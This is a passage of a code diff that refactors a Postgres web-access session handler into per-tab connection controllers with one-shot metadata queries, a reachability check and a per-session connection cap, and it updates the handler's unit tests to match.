TPostgresClientMessage, + { + type: PostgresClientMessageType.GetTableDetail | PostgresClientMessageType.Query | PostgresClientMessageType.Cancel; + } +>; + +export type TPostgresConnectionController = { + connectionId: string; + backendPid: number | null; + handleMessage: (msg: TTabScopedMessage) => void; + dispose: () => void; + isDisposing: () => boolean; +}; + +// Type parser shared between the pg.Client and pg-cursor instances so all +// results β€” whether fetched via the simple query path or cursor β€” apply the +// same normalisation rules. +const pgTypes = { + getTypeParser: (oid: number) => { + // Boolean (OID 16): Postgres wire protocol sends 't'/'f' β€” expand to 'true'/'false' + // so the Data Explorer UI displays human-readable literals. + if (oid === 16) + return (val: string | Buffer) => { + const raw = typeof val === "string" ? val : val.toString("utf8"); + return raw === "t" ? "true" : "false"; + }; + return (val: string | Buffer) => (typeof val === "string" ? val : val.toString("hex")); + } +}; + +export const createPostgresConnectionController = async ( + params: ControllerParams +): Promise => { + const { relayPort, username, database, sessionId, connectionId, sendResponse, onUnexpectedTermination } = params; + + const pgClient = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 30_000, + statement_timeout: 30_000, + types: pgTypes + }); + + await pgClient.connect(); + + const { rows: pidRows } = await pgClient.query<{ pid: number }>("SELECT pg_backend_pid() AS pid"); + const backendPid = pidRows[0]?.pid ?? null; + + // Server-side transaction state β€” updated after every query so the client + // always receives the authoritative value, including for multi-statement SQL. + let isInTransaction = false; + let disposing = false; + + const sendQueryError = async (id: string, err: unknown) => { + const pgErr = err as { message?: string; detail?: string; hint?: string }; + + // If the failed query was inside a transaction, roll back so the + // connection is not stuck in an aborted transaction state. + try { + await pgClient.query("ROLLBACK"); + } catch { + // ROLLBACK fails if there was no active transaction β€” safe to ignore. + } + + isInTransaction = false; + + sendResponse({ + type: PostgresServerMessageType.Error, + id, + connectionId, + transactionOpen: false, + error: pgErr.message ?? "Query execution failed", + detail: pgErr.detail, + hint: pgErr.hint + }); + }; + + // Cancel the currently running query via pg_cancel_backend. + // Runs on a separate connection so it is not blocked by the sequential queue. + const cancelRunningQuery = async () => { + if (!backendPid) return; + const cancelClient = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 5_000 + }); + // pg.Client is an EventEmitter; an unhandled 'error' would throw and + // crash the Node process. Attach a no-op listener. + cancelClient.on("error", (err) => { + logger.debug(err, `Cancel client error [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + try { + await cancelClient.connect(); + await cancelClient.query("SELECT pg_cancel_backend($1)", [backendPid]); + } catch (err) { + logger.debug(err, `Failed to cancel backend query [sessionId=${sessionId}] [connectionId=${connectionId}]`); + } finally { + await cancelClient.end().catch(() => {}); + } + }; + + // Sequential message processing to prevent concurrent query issues on the + // same pg.Client. Each controller has its own queue. + let processingPromise: Promise = Promise.resolve(); + + const handleMessage = (message: TTabScopedMessage) => { + // Cancel is handled immediately outside the sequential queue so it can + // interrupt a running query rather than waiting behind it. + if (message.type === PostgresClientMessageType.Cancel) { + if (disposing) return; + void cancelRunningQuery(); + return; + } + + processingPromise = processingPromise + .then(async () => { + if (disposing) return; + + switch (message.type) { + case PostgresClientMessageType.GetTableDetail: { + try { + const query = getTableDetailQuery(message.schema, message.table); + const result = await pgClient.query<{ result: string }>(query.text, query.values); + const rawDetail = result.rows[0]?.result; + if (!rawDetail) { + sendResponse({ + type: PostgresServerMessageType.Error, + id: message.id, + connectionId, + transactionOpen: isInTransaction, + error: "Table not found or no metadata available" + }); + break; + } + const detail = + typeof rawDetail === "string" + ? (JSON.parse(rawDetail) as Record) + : (rawDetail as unknown as Record); + sendResponse({ + type: PostgresServerMessageType.TableDetail, + id: message.id, + connectionId, + transactionOpen: isInTransaction, + data: detail as { + columns: { + name: string; + type: string; + nullable: boolean; + identityGeneration: string | null; + }[]; + primaryKeys: string[]; + foreignKeys: { + constraintName: string; + columns: string[]; + targetSchema: string; + targetTable: string; + targetColumns: string[]; + }[]; + } + }); + } catch (err) { + await sendQueryError(message.id, err); + } + break; + } + + case PostgresClientMessageType.Query: { + try { + const startTime = performance.now(); + const MAX_ROWS = 1000; + + // Split the SQL into individual statements using the real PostgreSQL C parser + // (via libpg-query WASM). Each statement is then run through a pg-cursor with + // an explicit row cap β€” the server sends at most MAX_ROWS+1 rows at the wire + // level regardless of result set size, so memory usage is bounded. + // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment + const parsed = await parseSql(message.sql); + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + const stmtTexts = (parsed.stmts as Array<{ stmt_location?: number; stmt_len?: number }>).map((s) => { + const location = s.stmt_location ?? 0; + return s.stmt_len !== undefined + ? message.sql.slice(location, location + s.stmt_len) + : message.sql.slice(location).trim(); + }); + + let lastRows: Record[] = []; + let lastFields: { name: string }[] = []; + let lastRowCount: number | null = null; + let lastCommand = ""; + let lastIsTruncated = false; + + for (const stmtSql of stmtTexts) { + const cursor = pgClient.query(new Cursor(stmtSql.trim(), null, { types: pgTypes })); + // eslint-disable-next-line no-await-in-loop + const stmtRows = await cursor.read(MAX_ROWS + 1); + const stmtIsTruncated = stmtRows.length > MAX_ROWS; + if (stmtIsTruncated) stmtRows.splice(MAX_ROWS); + // eslint-disable-next-line no-await-in-loop + await cursor.close(); + + // eslint-disable-next-line no-underscore-dangle + const cursorResult = cursor._result; + const cmd = (cursorResult.command ?? "").toUpperCase(); + if (cmd === "BEGIN" || cmd === "START") isInTransaction = true; + if (cmd === "COMMIT" || cmd === "ROLLBACK") isInTransaction = false; + + lastRows = stmtRows; + lastFields = (cursorResult.fields ?? []).map((f) => ({ name: f.name })); + lastRowCount = cursorResult.rowCount; + lastCommand = cursorResult.command ?? ""; + lastIsTruncated = stmtIsTruncated; + } + + const executionTimeMs = Math.round(performance.now() - startTime); + sendResponse({ + type: PostgresServerMessageType.QueryResult, + id: message.id, + connectionId, + rows: lastRows, + fields: lastFields, + rowCount: lastRowCount, + isTruncated: lastIsTruncated, + transactionOpen: isInTransaction, + command: lastCommand, + executionTimeMs + }); + } catch (err) { + await sendQueryError(message.id, err); + } + break; + } + + default: + break; + } + }) + .catch((err) => { + logger.error(err, `Error processing Postgres message [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + }; + + // Server-initiated termination β€” pg.Client errors outside clean dispose. + pgClient.on("error", (err) => { + if (disposing) return; + logger.error(err, `Tab connection error [sessionId=${sessionId}] [connectionId=${connectionId}]`); + disposing = true; + onUnexpectedTermination(err.message || "Database connection error"); + }); + + pgClient.on("end", () => { + if (disposing) return; + disposing = true; + onUnexpectedTermination("Database connection ended"); + }); + + const dispose = () => { + if (disposing) return; + disposing = true; + // Fire-and-forget: Postgres auto-rollbacks uncommitted txns on socket close + // and cleans up backend PIDs when it next tries to write. No explicit + // ROLLBACK needed β€” keeps dispose synchronous from the caller's view. + void pgClient.end().catch((err) => { + logger.debug(err, `Error closing pg client [sessionId=${sessionId}] [connectionId=${connectionId}]`); + }); + }; + + return { + connectionId, + backendPid, + handleMessage, + dispose, + isDisposing: () => disposing + }; +}; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts b/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts new file mode 100644 index 00000000000..90ac171b82b --- /dev/null +++ b/backend/src/ee/services/pam-web-access/pam-postgres-metadata.ts @@ -0,0 +1,66 @@ +import pg from "pg"; + +import { logger } from "@app/lib/logger"; + +import { getSchemasQuery, getTablesQuery } from "./pam-postgres-data-explorer-metadata"; + +// Shared connection options for one-shot metadata queries. Each call opens a +// fresh pg.Client, runs one query, then disposes β€” no persistent BE state. +type OneShotOptions = { + relayPort: number; + username: string; + database: string; +}; + +const buildClient = ({ relayPort, username, database }: OneShotOptions): pg.Client => { + const client = new pg.Client({ + host: "localhost", + port: relayPort, + user: username, + database, + password: "", + ssl: false, + connectionTimeoutMillis: 10_000, + statement_timeout: 30_000 + }); + // pg.Client is an EventEmitter; an unhandled 'error' (e.g. mid-query socket + // reset) would throw and crash the Node process. Attach a no-op listener. + client.on("error", (err) => { + logger.debug(err, "one-shot pg client error"); + }); + return client; +}; + +const withClient = async (opts: OneShotOptions, fn: (client: pg.Client) => Promise): Promise => { + const client = buildClient(opts); + await client.connect(); + try { + return await fn(client); + } finally { + await client.end().catch(() => {}); + } +}; + +export const fetchSchemasOneShot = (opts: OneShotOptions): Promise<{ name: string }[]> => + withClient(opts, async (client) => { + const query = getSchemasQuery(); + const result = await client.query<{ name: string }>(query.text, query.values); + return result.rows; + }); + +export const fetchTablesOneShot = ( + opts: OneShotOptions, + schema: string +): Promise<{ name: string; tableType: string }[]> => + withClient(opts, async (client) => { + const query = getTablesQuery(schema); + const result = await client.query<{ name: string; tableType: string }>(query.text, query.values); + return result.rows; + }); + +// Called once at WS setup to fail fast if credentials or tunnel are broken β€” +// preserves the early "Connection error" UX we used to get from pgClient.connect(). +export const verifyReachabilityOneShot = (opts: OneShotOptions): Promise => + withClient(opts, async (client) => { + await client.query("SELECT 1"); + }); diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts index 5a4bf5635eb..8d724124e62 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.test.ts @@ -3,13 +3,18 @@ /* eslint-disable @typescript-eslint/no-unsafe-call */ /* eslint-disable @typescript-eslint/no-unsafe-argument */ /* eslint-disable @typescript-eslint/unbound-method */ +/* eslint-disable @typescript-eslint/no-explicit-any */ import { beforeEach, describe, expect, test, vi } from "vitest"; import type WebSocket from "ws"; import { PostgresClientMessageType, PostgresServerMessageType } from "./pam-postgres-ws-types"; -import { TerminalServerMessageType, type TSessionContext, type TWebSocketServerMessage } from "./pam-web-access-types"; +import { + SessionEndReason, + TerminalServerMessageType, + type TSessionContext, + type TWebSocketServerMessage +} from "./pam-web-access-types"; -// Mock logger vi.mock("@app/lib/logger", () => ({ logger: { info: vi.fn(), @@ -19,30 +24,55 @@ vi.mock("@app/lib/logger", () => ({ } })); -// Mock the REPL (terminal sessions create one eagerly) -vi.mock("./pam-web-access-repl", () => ({ - createPamSqlRepl: vi.fn(() => ({ - getPrompt: vi.fn().mockReturnValue("=> "), - clearBuffer: vi.fn(), - processInput: vi.fn().mockResolvedValue({ output: "", prompt: "=> ", shouldClose: false }) - })) -})); +// Per-client script lets individual tests stub behaviour for the Nth pg.Client +// that gets constructed. Useful for simulating mid-life failures, differing +// backend PIDs across tab controllers, etc. +type ClientScript = { + connect?: () => Promise; + query?: (text: string, values?: unknown[]) => Promise; + end?: () => Promise; +}; + +const clientScripts: ClientScript[] = []; +const createdClients: MockPgClient[] = []; + +type MockPgClient = { + query: ReturnType; + connect: ReturnType; + end: ReturnType; + on: ReturnType; + emit: (event: string, ...args: unknown[]) => void; + _listeners: Record void>>; +}; -// Mock pg vi.mock("pg", () => { - const mockQuery = vi.fn().mockResolvedValue({ rows: [] }); - const mockConnect = vi.fn().mockResolvedValue(undefined); - const mockEnd = vi.fn().mockResolvedValue(undefined); - const mockOn = vi.fn(); + const makeClient = (): MockPgClient => { + const script = clientScripts.shift() ?? {}; + const defaultQuery = vi.fn(async (text: string) => { + if (text.includes("pg_backend_pid")) return { rows: [{ pid: 1000 + createdClients.length }] }; + return { rows: [] }; + }); + const listeners: Record void>> = {}; + const client: MockPgClient = { + query: vi.fn(script.query ?? defaultQuery), + connect: vi.fn(script.connect ?? (async () => {})), + end: vi.fn(script.end ?? (async () => {})), + on: vi.fn((event: string, cb: (...args: unknown[]) => void) => { + listeners[event] = listeners[event] || []; + listeners[event].push(cb); + }), + emit: (event: string, ...args: unknown[]) => { + (listeners[event] || []).forEach((cb) => cb(...args)); + }, + _listeners: listeners + }; + createdClients.push(client); + return client; + }; return { default: { - Client: vi.fn(() => ({ - query: mockQuery, - connect: mockConnect, - end: mockEnd, - on: mockOn - })) + Client: vi.fn(() => makeClient()) } }; }); @@ -53,12 +83,11 @@ import pg from "pg"; // eslint-disable-next-line import/first import { handlePostgresSession } from "./pam-postgres-session-handler"; -type MockPgClient = { - query: ReturnType; - connect: ReturnType; - end: ReturnType; - on: ReturnType; -}; +function resetMockState() { + clientScripts.length = 0; + createdClients.length = 0; + (pg.Client as unknown as { mockClear: () => void }).mockClear(); +} function createMockContext(): TSessionContext & { sentMessages: TWebSocketServerMessage[] } { const sentMessages: TWebSocketServerMessage[] = []; @@ -88,81 +117,318 @@ const mockParams = { credentials: { username: "testuser" } } as Parameters[1]; -function getPgInstance(): MockPgClient { - const ClientMock = pg.Client as unknown as { mock: { results: { value: MockPgClient }[] } }; - return ClientMock.mock.results[ClientMock.mock.results.length - 1].value; +function getMessageHandler(ctx: TSessionContext): (data: Buffer) => void { + const messageCall = (ctx.socket.on as ReturnType).mock.calls.find( + ([event]: string[]) => event === "message" + ); + return messageCall![1] as (data: Buffer) => void; +} + +function getSentResponses(ctx: TSessionContext): any[] { + const send = ctx.socket.send as unknown as ReturnType; + // eslint-disable-next-line @typescript-eslint/no-unsafe-return + return send.mock.calls.map(([raw]) => JSON.parse(raw as string)); +} + +async function openConnection(ctx: TSessionContext, id = "11111111-1111-1111-1111-111111111111"): Promise { + const onMessage = getMessageHandler(ctx); + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.OpenConnection, id }))); + // Let microtasks settle for the async open flow. + await new Promise((resolve) => { + setTimeout(resolve, 10); + }); + const resp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.ConnectionOpened && r.id === id); + if (!resp) throw new Error("open-connection did not ack"); + return resp.connectionId as string; } describe("handlePostgresSession", () => { beforeEach(() => { vi.clearAllMocks(); + resetMockState(); }); - test("connects to database and sends ready message", async () => { + test("sends ready after reachability check succeeds", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + expect(ctx.sendMessage).toHaveBeenCalledWith(expect.objectContaining({ type: TerminalServerMessageType.Ready })); + // Reachability check β€” one short-lived client. + expect(pg.Client).toHaveBeenCalledTimes(1); + }); + + test("tears down the WS when reachability check fails", async () => { + clientScripts.push({ + connect: async () => { + throw new Error("connection refused"); + } + }); const ctx = createMockContext(); const result = await handlePostgresSession(ctx, mockParams); - expect(pg.Client).toHaveBeenCalledWith( - expect.objectContaining({ - host: "localhost", - port: 5432, - user: "testuser", - database: "testdb" - }) + expect(ctx.sendSessionEnd).toHaveBeenCalledWith(SessionEndReason.SetupFailed); + expect(ctx.sendMessage).not.toHaveBeenCalledWith( + expect.objectContaining({ type: TerminalServerMessageType.Ready }) ); - expect(ctx.sendMessage).toHaveBeenCalledWith( - expect.objectContaining({ - type: TerminalServerMessageType.Ready + expect(result.cleanup).toBeDefined(); + }); + + test("open-connection creates a controller and returns connectionId + backendPid", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const connectionId = await openConnection(ctx); + expect(connectionId).toMatch(/[0-9a-f-]{36}/i); + const resp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.ConnectionOpened); + expect(resp.backendPid).toBeTypeOf("number"); + }); + + test("get-schemas uses a short-lived client and works with no tab controllers", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + // Script a schemas query response on the next client created. + clientScripts.push({ + query: vi.fn(async (text: string) => { + if (text.includes("pg_namespace")) return { rows: [{ name: "public" }] }; + return { rows: [] }; + }) + }); + + const onMessage = getMessageHandler(ctx); + const reqId = "22222222-2222-2222-2222-222222222222"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.GetSchemas, id: reqId }))); + + await new Promise((r) => { + setTimeout(r, 20); + }); + + const responses = getSentResponses(ctx); + const schemasResp = responses.find((r) => r.type === PostgresServerMessageType.Schemas && r.id === reqId); + expect(schemasResp).toBeTruthy(); + expect(schemasResp.data).toEqual([{ name: "public" }]); + }); + + test("get-tables works while a tab controller is open", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + await openConnection(ctx); + + clientScripts.push({ + query: vi.fn(async (text: string) => { + if (text.includes("pg_class")) return { rows: [{ name: "users", tableType: "table" }] }; + return { rows: [] }; }) + }); + + const onMessage = getMessageHandler(ctx); + const reqId = "33333333-3333-3333-3333-333333333333"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.GetTables, id: reqId, schema: "public" }))); + + await new Promise((r) => { + setTimeout(r, 20); + }); + const tablesResp = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Tables && r.id === reqId); + expect(tablesResp).toBeTruthy(); + expect(tablesResp.data).toEqual([{ name: "users", tableType: "table" }]); + }); + + test("unknown connectionId on tab-scoped message returns 'Connection not found'", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const onMessage = getMessageHandler(ctx); + const reqId = "44444444-4444-4444-4444-444444444444"; + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Query, + id: reqId, + connectionId: "99999999-9999-9999-9999-999999999999", + sql: "SELECT 1" + }) + ) ); - expect(result.cleanup).toBeDefined(); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const err = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Error && r.id === reqId); + expect(err).toBeTruthy(); + expect(err.error).toContain("Connection not found"); }); - test("registers message handler on socket", async () => { + test("close-connection on unknown id is a silent no-op", async () => { const ctx = createMockContext(); await handlePostgresSession(ctx, mockParams); - expect(ctx.socket.on).toHaveBeenCalledWith("message", expect.any(Function)); + const onMessage = getMessageHandler(ctx); + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.CloseConnection, + connectionId: "99999999-9999-9999-9999-999999999999" + }) + ) + ); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const responses = getSentResponses(ctx); + // No response ever sent for close-connection. + expect(responses.filter((r) => r.type === PostgresServerMessageType.ConnectionClosed)).toEqual([]); + expect(responses.filter((r) => r.type === PostgresServerMessageType.Error)).toEqual([]); }); - test("cleanup closes pg client", async () => { + test("cancel on unknown connectionId is a silent no-op", async () => { const ctx = createMockContext(); - const result = await handlePostgresSession(ctx, mockParams); - const pgInstance = getPgInstance(); + await handlePostgresSession(ctx, mockParams); - await result.cleanup(); - expect(pgInstance.end).toHaveBeenCalled(); + const onMessage = getMessageHandler(ctx); + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Cancel, + connectionId: "99999999-9999-9999-9999-999999999999" + }) + ) + ); + + await new Promise((r) => { + setTimeout(r, 10); + }); + expect(getSentResponses(ctx)).toEqual([]); }); - test("handles get-schemas data explorer message", async () => { + test("activity keepalive is accepted and emits no response", async () => { const ctx = createMockContext(); await handlePostgresSession(ctx, mockParams); - const pgInstance = getPgInstance(); - pgInstance.query.mockResolvedValue({ - rows: [{ name: "public" }, { name: "auth" }] + const onMessage = getMessageHandler(ctx); + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.Activity }))); + + await new Promise((r) => { + setTimeout(r, 10); }); + expect(getSentResponses(ctx)).toEqual([]); + expect(ctx.sendSessionEnd).not.toHaveBeenCalled(); + }); + + test("server-initiated controller death removes entry and emits connection-closed", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + const connectionId = await openConnection(ctx); - // Get the message handler callback - const messageCall = (ctx.socket.on as ReturnType).mock.calls.find( - ([event]: string[]) => event === "message" + // Grab the tab controller's pg.Client (created after reachability client). + const tabClient = createdClients[1]; + tabClient.emit("error", new Error("peer reset")); + + await new Promise((r) => { + setTimeout(r, 10); + }); + const closedEvt = getSentResponses(ctx).find( + (r) => r.type === PostgresServerMessageType.ConnectionClosed && r.connectionId === connectionId ); - const onMessage = messageCall?.[1] as ((data: Buffer) => void) | undefined; + expect(closedEvt).toBeTruthy(); + expect(closedEvt.reason).toBe("peer reset"); - if (onMessage) { - const msg = Buffer.from( - JSON.stringify({ type: PostgresClientMessageType.GetSchemas, id: "550e8400-e29b-41d4-a716-446655440000" }) - ); - onMessage(msg); + // Subsequent tab-scoped message for the same id should now miss. + const onMessage = getMessageHandler(ctx); + const reqId = "55555555-5555-5555-5555-555555555555"; + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.Query, + id: reqId, + connectionId, + sql: "SELECT 1" + }) + ) + ); + await new Promise((r) => { + setTimeout(r, 10); + }); + const err = getSentResponses(ctx).find((r) => r.type === PostgresServerMessageType.Error && r.id === reqId); + expect(err.error).toContain("Connection not found"); + }); - // Wait for async processing - await new Promise((resolve) => { - setTimeout(resolve, 50); - }); + test("exceeding MAX_CONNECTIONS_PER_WS returns connection-open-failed", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + for (let i = 0; i < 20; i += 1) { + // eslint-disable-next-line no-await-in-loop + await openConnection(ctx, `aaaaaaaa-aaaa-aaaa-aaaa-${String(i).padStart(12, "0")}`); + } + + const onMessage = getMessageHandler(ctx); + const overflowId = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; + onMessage(Buffer.from(JSON.stringify({ type: PostgresClientMessageType.OpenConnection, id: overflowId }))); + await new Promise((r) => { + setTimeout(r, 10); + }); + const failed = getSentResponses(ctx).find( + (r) => r.type === PostgresServerMessageType.ConnectionOpenFailed && r.id === overflowId + ); + expect(failed).toBeTruthy(); + expect(failed.error).toContain("Maximum"); + }); - expect((ctx.socket as unknown as { send: ReturnType }).send).toHaveBeenCalledWith( - expect.stringContaining(`"${PostgresServerMessageType.Schemas}"`) + test("concurrent open-connection requests cannot bypass the cap", async () => { + // Simulates a client firing 25 opens at once. Without the pendingOpens + // counter, each check against controllers.size would see 0 before any + // controller finished connecting, and all 25 would succeed. + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + const onMessage = getMessageHandler(ctx); + const ATTEMPTS = 25; + for (let i = 0; i < ATTEMPTS; i += 1) { + onMessage( + Buffer.from( + JSON.stringify({ + type: PostgresClientMessageType.OpenConnection, + id: `eeeeeeee-eeee-eeee-eeee-${String(i).padStart(12, "0")}` + }) + ) ); } + + await new Promise((r) => { + setTimeout(r, 50); + }); + + const opened = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpened); + const failed = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpenFailed); + expect(opened.length).toBe(20); + expect(failed.length).toBe(ATTEMPTS - 20); + }); + + test("cleanup disposes every controller", async () => { + const ctx = createMockContext(); + const result = await handlePostgresSession(ctx, mockParams); + await openConnection(ctx, "cccccccc-cccc-cccc-cccc-cccccccccccc"); + await openConnection(ctx, "dddddddd-dddd-dddd-dddd-dddddddddddd"); + + const tabClients = createdClients.slice(1, 3); + + await result.cleanup(); + + tabClients.forEach((c) => { + expect(c.end).toHaveBeenCalled(); + }); + }); + + test("two tab controllers have independent backendPids", async () => { + const ctx = createMockContext(); + await handlePostgresSession(ctx, mockParams); + + await openConnection(ctx, "eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee"); + await openConnection(ctx, "ffffffff-ffff-ffff-ffff-ffffffffffff"); + + const opens = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpened); + expect(opens).toHaveLength(2); + expect(opens[0].backendPid).not.toBe(opens[1].backendPid); }); }); diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts index 43d3d89c22e..cbf32726388 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts @@ -1,6 +1,4 @@ -import { parse as parseSql } from "libpg-query"; -import pg from "pg"; -import Cursor from "pg-cursor"; +import crypto from "crypto"; import { TPostgresAccountCredentials, @@ -8,15 +6,18 @@ import { } from "@app/ee/services/pam-resource/postgres/postgres-resource-types"; import { logger } from "@app/lib/logger"; -import { getSchemasQuery, getTableDetailQuery, getTablesQuery } from "./pam-postgres-data-explorer-metadata"; +import { + createPostgresConnectionController, + type TPostgresConnectionController +} from "./pam-postgres-connection-controller"; +import { fetchSchemasOneShot, fetchTablesOneShot, verifyReachabilityOneShot } from "./pam-postgres-metadata"; import { PostgresClientMessageSchema, PostgresClientMessageType, PostgresServerMessageType, type TPostgresCorrelatedServerMessage } from "./pam-postgres-ws-types"; -import { parseClientMessage, resolveEndReason } from "./pam-web-access-fns"; -import { createPamSqlRepl } from "./pam-web-access-repl"; +import { parseClientMessage } from "./pam-web-access-fns"; import { SessionEndReason, TerminalServerMessageType, @@ -29,56 +30,52 @@ type TPostgresSessionParams = { credentials: TPostgresAccountCredentials; }; +// Fan-out bound inside a single already-authenticated WS session. +const MAX_CONNECTIONS_PER_WS = 20; + +// Unwrap a pg driver error into the shape our WS error responses expect. +const toPgErrorFields = (err: unknown) => { + const pgErr = err as { message?: string; detail?: string; hint?: string }; + return { message: pgErr.message, detail: pgErr.detail, hint: pgErr.hint }; +}; + export const handlePostgresSession = async ( ctx: TSessionContext, params: TPostgresSessionParams ): Promise => { - const { socket, relayPort, resourceName, sessionId, sendMessage, sendSessionEnd, isNearSessionExpiry, onCleanup } = - ctx; + const { socket, relayPort, resourceName, sessionId, sendMessage, sendSessionEnd, onCleanup } = ctx; const { connectionDetails, credentials } = params; - // Type parser shared between the pg.Client and pg-cursor instances so all - // results β€” whether fetched via the simple query path or cursor β€” apply the - // same normalisation rules. - const pgTypes = { - getTypeParser: (oid: number) => { - // Boolean (OID 16): Postgres wire protocol sends 't'/'f' β€” expand to 'true'/'false' - // so the Data Explorer UI displays human-readable literals. - if (oid === 16) - return (val: string | Buffer) => { - const raw = typeof val === "string" ? val : val.toString("utf8"); - return raw === "t" ? "true" : "false"; - }; - return (val: string | Buffer) => (typeof val === "string" ? val : val.toString("hex")); - } + const oneShotOpts = { + relayPort, + username: credentials.username, + database: connectionDetails.database }; - const pgClient = new pg.Client({ - host: "localhost", - port: relayPort, - user: credentials.username, - database: connectionDetails.database, - password: "", - ssl: false, - connectionTimeoutMillis: 30_000, - statement_timeout: 30_000, - types: pgTypes - }); - - await pgClient.connect(); - - const { rows: pidRows } = await pgClient.query<{ pid: number }>("SELECT pg_backend_pid() AS pid"); - const backendPid = pidRows[0]?.pid; - - const repl = createPamSqlRepl(pgClient); + // Early reachability check β€” fail fast before sending ready, preserving the + // early "Connection error" UX the FE relies on. + try { + await verifyReachabilityOneShot(oneShotOpts); + } catch (err) { + logger.error(err, `Postgres reachability check failed [sessionId=${sessionId}]`); + sendSessionEnd(SessionEndReason.SetupFailed); + onCleanup(); + try { + socket.close(); + } catch { + // ignore + } + return { + cleanup: async () => {} + }; + } sendMessage({ type: TerminalServerMessageType.Ready, - data: `Connected to ${resourceName} (${connectionDetails.database}) as ${credentials.username}\n\n`, - prompt: "=> " + data: `Connected to ${resourceName} (${connectionDetails.database}) as ${credentials.username}\n\n` }); - logger.info({ sessionId }, "Postgres web access session established"); + logger.info(`Postgres web access session established [sessionId=${sessionId}]`); const sendResponse = (msg: TPostgresCorrelatedServerMessage) => { try { @@ -86,289 +83,198 @@ export const handlePostgresSession = async ( socket.send(JSON.stringify(msg)); } } catch (err) { - logger.error(err, "Failed to send WebSocket message"); + logger.error(err, `Failed to send WebSocket message [sessionId=${sessionId}]`); } }; - // Server-side transaction state β€” updated after every query so the client - // always receives the authoritative value, including for multi-statement SQL. - let isInTransaction = false; + const controllers = new Map(); + // Reserved slots for in-flight opens β€” counted against the cap so a burst of + // open-connection messages can't all pass the check before any of them + // finishes inserting into `controllers`. + let pendingOpens = 0; - // Shared error handler for correlated query messages - const sendQueryError = async (id: string, err: unknown) => { - const pgErr = err as { message?: string; detail?: string; hint?: string }; - - // If the failed query was inside a transaction, roll back so the - // connection is not stuck in an aborted transaction state. - try { - await pgClient.query("ROLLBACK"); - } catch { - // ROLLBACK fails if there was no active transaction β€” safe to ignore. - } + // Metadata requests (get-schemas / get-tables) are processed outside any + // controller queue so sidebar refreshes don't block tab work. + let metadataPromise: Promise = Promise.resolve(); - isInTransaction = false; + // --- Per-message handlers --- - sendResponse({ - type: PostgresServerMessageType.Error, - id, - error: pgErr.message ?? "Query execution failed", - detail: pgErr.detail, - hint: pgErr.hint - }); - }; + const openTabConnection = async (requestId: string) => { + if (controllers.size + pendingOpens >= MAX_CONNECTIONS_PER_WS) { + sendResponse({ + type: PostgresServerMessageType.ConnectionOpenFailed, + id: requestId, + error: `Maximum ${MAX_CONNECTIONS_PER_WS} connections per session reached` + }); + return; + } - // Cancel the currently running query via pg_cancel_backend. - // Runs on a separate connection so it is not blocked by the sequential queue. - const cancelRunningQuery = async () => { - if (!backendPid) return; - const pid = backendPid; - const cancelClient = new pg.Client({ - host: "localhost", - port: relayPort, - user: credentials.username, - database: connectionDetails.database, - password: "", - ssl: false, - connectionTimeoutMillis: 5_000 - }); + pendingOpens += 1; + const connectionId = crypto.randomUUID(); try { - await cancelClient.connect(); - await cancelClient.query("SELECT pg_cancel_backend($1)", [pid]); + const controller = await createPostgresConnectionController({ + relayPort, + username: credentials.username, + database: connectionDetails.database, + sessionId, + connectionId, + sendResponse, + onUnexpectedTermination: (reason) => { + if (!controllers.has(connectionId)) return; + controllers.delete(connectionId); + sendResponse({ + type: PostgresServerMessageType.ConnectionClosed, + connectionId, + reason + }); + } + }); + controllers.set(connectionId, controller); + sendResponse({ + type: PostgresServerMessageType.ConnectionOpened, + id: requestId, + connectionId, + backendPid: controller.backendPid + }); } catch (err) { - logger.debug(err, "Failed to cancel backend query"); + const msg = err instanceof Error ? err.message : "Failed to open connection"; + logger.error(err, `Failed to open tab connection 